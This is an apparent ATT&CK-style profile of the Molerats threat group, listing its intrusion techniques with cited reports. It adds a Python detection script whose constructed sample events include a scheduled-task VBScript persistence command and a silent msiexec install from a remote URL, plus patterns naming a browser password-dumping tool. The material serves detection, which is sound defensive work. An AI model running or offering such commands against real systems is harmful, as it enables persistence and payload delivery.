G0021 Molerats
Molerats is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.[1][2][3][4]
Item | Value |
---|---|
ID | G0021 |
Associated Names | Operation Molerats, Gaza Cybergang |
Version | 2.0 |
Created | 31 May 2017 |
Last Modified | 27 April 2021 |
Associated Group Descriptions
Name | Description |
---|---|
Operation Molerats | [5][4] |
Gaza Cybergang | [1][3][4] |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
enterprise | T1547 | Boot or Logon Autostart Execution | - |
enterprise | T1547.001 | Registry Run Keys / Startup Folder | Molerats saved malicious files within the AppData and Startup folders to maintain persistence.[3] |
enterprise | T1059 | Command and Scripting Interpreter | - |
enterprise | T1059.001 | PowerShell | Molerats used PowerShell implants on target machines.[3] |
enterprise | T1059.005 | Visual Basic | Molerats used various implants, including those built with VBScript, on target machines.[3][6] |
enterprise | T1059.007 | JavaScript | Molerats used various implants, including those built with JavaScript, on target machines.[3] |
enterprise | T1555 | Credentials from Password Stores | - |
enterprise | T1555.003 | Credentials from Web Browsers | Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.[1] |
enterprise | T1140 | Deobfuscate/Decode Files or Information | Molerats decompresses ZIP files once they are on the victim machine.[3] |
enterprise | T1105 | Ingress Tool Transfer | Molerats used executables to download malicious files from different sources.[3][6] |
enterprise | T1027 | Obfuscated Files or Information | Molerats has delivered compressed executables within ZIP files to victims.[3] |
enterprise | T1566 | Phishing | - |
enterprise | T1566.001 | Spearphishing Attachment | Molerats has sent phishing emails with malicious Microsoft Word and PDF attachments.[3][6][4] |
enterprise | T1566.002 | Spearphishing Link | Molerats has sent phishing emails with malicious links included.[3] |
enterprise | T1057 | Process Discovery | Molerats actors obtained a list of active processes on the victim and sent it to C2 servers.[1] |
enterprise | T1053 | Scheduled Task/Job | - |
enterprise | T1053.005 | Scheduled Task | Molerats has created scheduled tasks to persistently run VBScripts.[6] |
enterprise | T1553 | Subvert Trust Controls | - |
enterprise | T1553.002 | Code Signing | Molerats has used forged Microsoft code-signing certificates on malware.[5] |
enterprise | T1218 | System Binary Proxy Execution | - |
enterprise | T1218.007 | Msiexec | Molerats has used msiexec.exe to execute an MSI payload.[6] |
enterprise | T1204 | User Execution | - |
enterprise | T1204.001 | Malicious Link | Molerats has sent malicious links via email to trick users into opening a RAR archive and running an executable.[3][6] |
enterprise | T1204.002 | Malicious File | Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.[3][6][4] |
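Several of the techniques in the table leave distinctive host telemetry: a scheduled task whose action is a VBScript host, msiexec.exe installing a package from a URL or a user-writable directory, a file dropped into the Startup folder, and an Office process spawning a script host after Enable Content. The Python below, an added example that is not code from the ATT&CK page or from any of the cited reports, applies heuristic rules for T1547.001, T1053.005, T1059.001/.005/.007, T1204.002, T1218.007 and T1555.003 to constructed event records shaped loosely after Sysmon Event ID 1 (ProcessCreate) and Event ID 11 (FileCreate). The field names, path patterns, rule thresholds, and every sample value are assumptions for illustration, not real Molerats indicators.

```python
"""Heuristic detections keyed to the Molerats techniques in the table above.

Added example: not code from the ATT&CK page or from any cited report. Events are
constructed dicts shaped loosely after Sysmon Event ID 1 (ProcessCreate) and
Event ID 11 (FileCreate). Field names, path patterns and samples are assumptions.
"""
import re
from typing import Dict, List

# The page says payloads were staged in AppData and the Startup folder; NTFS paths
# are case-insensitive, so every pattern uses re.I.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads|public)\\", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _arg_after(cmd: str, flag: str) -> str:
    """Value following a switch such as /tr or /i, quotes stripped, '' if absent."""
    m = re.search(re.escape(flag) + r'\s+("[^"]+"|\S+)', cmd)
    return m.group(1).strip('"') if m else ""


def detect(event: Dict[str, str]) -> List[str]:
    """Return the ATT&CK technique IDs whose heuristic this event satisfies."""
    hits: List[str] = []
    etype = event.get("EventType", "ProcessCreate")
    image = _basename(event.get("Image", ""))
    cmd_l = event.get("CommandLine", "").lower()
    parent = _basename(event.get("ParentImage", ""))

    # T1547.001: an executable or script written to, or started from, the Startup folder.
    target = event.get("TargetFilename", "") if etype == "FileCreate" else event.get("Image", "")
    if STARTUP_DIR.search(target) and target.lower().endswith((".exe", ".vbs", ".js", ".lnk")):
        hits.append("T1547.001")
    if etype != "ProcessCreate":
        return hits

    # T1053.005 (+ T1059.005): schtasks creating a task whose action runs VBScript.
    if image == "schtasks.exe" and "/create" in cmd_l:
        action = _arg_after(cmd_l, "/tr")
        if any(s in action for s in ("wscript", "cscript", ".vbs")):
            hits += ["T1053.005", "T1059.005"]

    # T1218.007: msiexec installing a package fetched over HTTP or staged in a
    # user-writable directory (legitimate installs usually run from Program Files).
    if image == "msiexec.exe":
        pkg = _arg_after(cmd_l, "/i")
        if pkg.startswith(("http://", "https://")) or USER_WRITABLE.search(pkg):
            hits.append("T1218.007")

    # T1204.002 (+ T1059.x): an Office app spawning a script host, the usual
    # footprint of a macro that runs after the user clicks Enable Content.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("T1204.002")
        if image in ("wscript.exe", "cscript.exe"):
            hits.append("T1059.007" if ".js" in cmd_l else "T1059.005")
        elif image == "powershell.exe":
            hits.append("T1059.001")

    # T1555.003: the public BrowserPasswordDump tool named on the page, matched by
    # file name only; weak alone, since tools get renamed, so pair it with a hash.
    if "browserpassworddump" in image:
        hits.append("T1555.003")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Index -> technique hits for every event that matched at least one rule."""
    results: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample telemetry; no value here is a real Molerats indicator.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "wscript.exe C:\Users\alice\AppData\Roaming\up.vbs"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://example.invalid/setup.msi",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\doc.js"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventType": "FileCreate", "Image": r"C:\Users\alice\AppData\Roaming\svc.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\msiexec.exe",  # benign control
     "CommandLine": r'msiexec /i "C:\Program Files\Vendor\app.msi"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for i, techniques in scan(SAMPLE_EVENTS).items():
        print(i, _basename(SAMPLE_EVENTS[i]["Image"]), techniques)
```

The rules are deliberately narrow so they can be tuned per environment: the msiexec rule ignores packages under Program Files, the Startup-folder rule fires on file creation as well as execution so the persistence write is caught before the next logon, and the Office-parent rule is the only one that does not depend on a path or tool name, which is why it is the most durable of the set. A match on the BrowserPasswordDump file name should be treated as a lead, not a verdict, and confirmed with a file hash or the binary's metadata.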
Software
References
1. ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
2. ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.
3. GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.
4. Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.
5. Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.
6. Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.